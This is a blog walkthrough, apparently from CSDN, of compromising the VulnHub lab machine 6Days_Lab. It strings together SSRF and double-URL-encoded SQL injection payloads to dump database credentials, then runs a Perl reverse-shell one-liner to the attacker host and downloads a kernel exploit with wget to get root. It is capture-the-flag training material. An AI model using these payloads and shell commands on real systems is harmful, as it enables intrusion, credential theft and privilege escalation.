OSCP - 6Days_Lab-v1.0.1靶机

最新推荐文章于 2023-08-13 18:17:09 发布
最新推荐文章于 2023-08-13 18:17:09 发布
阅读量359 收藏
点赞数
分类专栏: 靶机 文章标签: linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/117741914
版权

OSCP - 6Days_Lab-v1.0.1靶机

 

arp-scan -l 扫描靶机IP地址

nmap -sV -Pn -A x.x.x.232

访问 http://x.x.x.232

输入折扣码,提示代码过期,没啥用处

查看页面源码

访问,得到出错,可能存在ssrf

修改src=后边参数为index.php,并没有拦截,也没有报错

使用dirb http://x.x.x.232,获取靶机网站目录结构文件

打开BP进行抓包,发现响应包是主页界面,访问passwd文件

查看config.php信息,得到数据库账号,密码,数据库名信息

其他发现的网站界面都会被ips拦截

查看apache默认配置信息

在apache默认文件中,发现网站实际就是在8080端口,只接受本地连接,然后转发到80端口

通过配置信息,获得的消息,可以发现网站直接跟mysql数据库连接,存在sql注入,两次url编码即可绕过

通过Python来生成sql语句

输入 python3  进入python3环境

from urllib.parse import quote ,引入quote模块里的url编码

quote(quote("SQL语句")),两次url编码sql语句

例如:quote(quote("aaaa'union select version(),2#")),获取当前数据库版本信息

payload:image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520version%2528%2529%252C2%2523

 

通过ssrf+sql注入,得到想要的信息

获取当前数据库payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520database%2528%2529%252C2%2523

获取当前数据库中的表payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528table_name%2529%252C2%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2523

获取表中字段名payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528column_name%2529%252C2%2520from%2520information_schema.columns%2520where%2520table_schema%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2523

获取所需账号密码信息payload:/image.php?src=http://127.0.0.1:8080/checkpromo.php?promocode=aaaa%2527union%2520select%2520group_concat%2528username%252C%2527~~~~%2527%252Cpassword%2529%252C2%2520from%2520fancydb.users%2523

获取到andrea账户的密码信息,开启了ssh端口,尝试使用ssh进行连接

输入命令 ssh andrea@192.168.1.103 

密码:SayNoToPentests

之后输入密码,连接成功

连接之后发现任何命令都没反应

ssh连接的靶机上输入命令:perl -e 'use Socket;$i="x.x.x.x";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

命令的i参数:后边的ip地址为自己攻击机主机的ip地址

 命令的p参数:后边为nc本地监听的端口

执行之后发现反弹命shell成功,命令也都有回显

python -c ’import pty; pty.spawn("/bin/bash")‘进入交互模式

进行提权

输入 uname -a,获取系统内核版本为3.13.0

搜索可用exp

输入命令 searchsploit 3.13.0,发现kali系统内置的exp脚本

 

将可用脚本下载到靶机平台

首先开启攻击机的python3服务

在反弹的shell中下载脚本

输入命令,wget http://192.168.1.102/37292.c

编译.c文件

执行./exp

获得root权限

进入跟根目录

执行./flag

获得flag的内容

 

xzhome
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场,6Days_Lab-v1.0.1
kukudeshuo的博客
07-08 446
vulnhub靶场,6Days_Lab-v1.0.1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/6days-lab-11,156/#flags 目标:获取根目录下的flag 下载好靶机后,使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 1、获取靶机IP地址 kali攻击机输入netdiscover,不添加任何参数,会默认扫描机器网卡上的ip值的所有网段,获取到的靶机IP地址为192.168.58.143
OSCP-vulnhub:GitRoot靶机实战
cjstang的博客
07-03 1763
OSCP5-vulnhub:GitRoot靶机实战,主要利用方式:hydra 密码破解+git show 反弹shell获取平行账号权限+git 命令提权,此靶场稍微有点困难,需要知晓git等若干使用方法及利用方式,踏坑无数。
Vulnhub-OSCP靶机实战
御七彩虹猫
05-10 2258
Vulnhub-OSCP靶机实战
vulnhub靶机--6Day_Lab-v1.0.1
Tauil的博客
08-01 257
修改src值,查看apache默认配置文件,发现网站端口是在8080,但是只接受本地连接,因为在80端口输入的信息都被IPS拦截,所以我们可以通过该出漏洞访问8080端口针对checkpromo.php的promocode值进行SQL注入。双击进入数据包,发现不论将src修改为何值都没有有效输出但是也没有错误显示或者拦截,打开burpsuite进行抓包,尝试重新发送,将src修改为index.php,回显了初始页面,说明该处存在目录路径漏洞。但是没有回显内容,尝试进行反弹shell,在原终端输入。.....
【oscp系列-Lampiaos】靶机2
weixin_44807430的博客
01-16 248
日拱一卒
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
1-OSCP自学笔记-October靶机练习1
08-04
【OSCP自学笔记-October靶机练习1】这篇教程主要介绍了如何通过渗透测试技术攻破一个名为"October"的靶机靶机来自于Vulnhub平台,作者选择了10台典型的靶机作为OSCP(Offensive Security Certified Professional)...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
OSCP:OSCP考试材料
05-01
OSCP Linkedin: : 电子邮件:
OSCP2018十一月考试指导.pdf
11-02
OSCP最新考试2018十一月考试指导,有截图, OSCP 考试是安全考试
OSCP考试报告模板减价:进攻性安全的减价模板OSCP,OSWE,OSCE,OSEE,OSWP考试报告
02-03
Markdown中的攻击性安全考试报告模板 我在Markdown中创建了攻击性安全考试报告模板,因此在进行攻击性安全OSCP,OSWE,OSCE,OSEE,OSWP考试时,不再需要LaTeX,Microsoft Office Word,LibreOffice Writer! 现在,您可以在检查报告编辑过程中提高效率和速度! :rocket: 加快写作速度,在考试报告编辑24小时内不要浪费时间 :star: 所见即所得的编辑器无格式麻烦, Microsoft Office Word和LibreOffice Writer的byebye多余的空格和换行符 :memo: 重复使用Markdown注释,您将很高兴不必将Markdown注释中的粗体和斜体重新格式化为报告 :locked: 准备好版本控制,将markdown模板保存到PRIVATE git存储库中,您知道要进行增量备份,版本控制可以使用Markdown(.md)作为文本,但不能使用二进制文件(.doc,.odt) :pen: 使用您最喜欢的编辑器或记笔记应用程序,通过Markdown,您将能够使用您最喜欢的编辑器(VS
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型及答题技巧 0x0009-windows提权笔记 0x0011-lab报告模板 0x0013-考试报告模板_v1 0x0014-考试报告模板_v2 0x0020-国外培训视频 windows提权笔记
OSCP-vulnhub:HACKLAB: VULNIX靶机实战
cjstang的博客
07-06 408
本期是OSCP练习中的一个靶场,此靶场涉及到VRFY、hydra、showmount、rsa密钥登录(坑有点大)
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 216
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
6Days_Lab-v1.0.1 - linux
战神/calmness的博客
01-22 368
目录 Download 信息收集 目录遍历 文件包含 调用了src函数 账户密码配置文件 passwd信息 查看apache默认配置信息 Python 通过ssrf+sql注入 获取当前数据库中的表 获取表中字段名 获取所需账号密码信息 SSH perl反弹shell 内核提权 搜索exp 参考链接 Download Back to the Top Please remember that VulnHub is a free community resource..
oscp靶机教程
weixin_68723119的博客
08-13 332
1.使用命令 arp-scan -l 列出当前局域网的所有设备,在oscp的网络适配器查看到的mac地址和扫描出来的192.168.211.141的MAC地址一致。先找一下有哪些我们可以利用的了,目前我们的用户是普通用户可以通过find命令找找一些特权命令,借助它可以从普通用户提升为root。找网站使用base64对内容进行解密,好家伙,是ssh连接私钥,找到宝了。只有一个用户“oscp”,要么它就是root,要么就是它是唯二用户。看到了bash,很亲切,去gtfobin搜索一下提权方法。
OSCP练习:vulhub靶机pinkys-palace-v1
weixin_47311099的博客
10-26 1250
在/var/www/html/littlesecrets-main/ultrasecretadminf1l35 发现rsa密钥.ultrasecret。账密为pinkymanage/3pinkysaf33pinkysaf3,ssh登录。发现8080,但是403,31337端口是http代理 ,64666为ssh。直接访问403,配置代理,访问127.0.0.1:8080。执行后没有反应,加上一点参数发现会进行输出,但执行不了命令。这个长得就像个sql注入…尝试缓冲区溢出,输入废字符, 得到边界值为72。
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值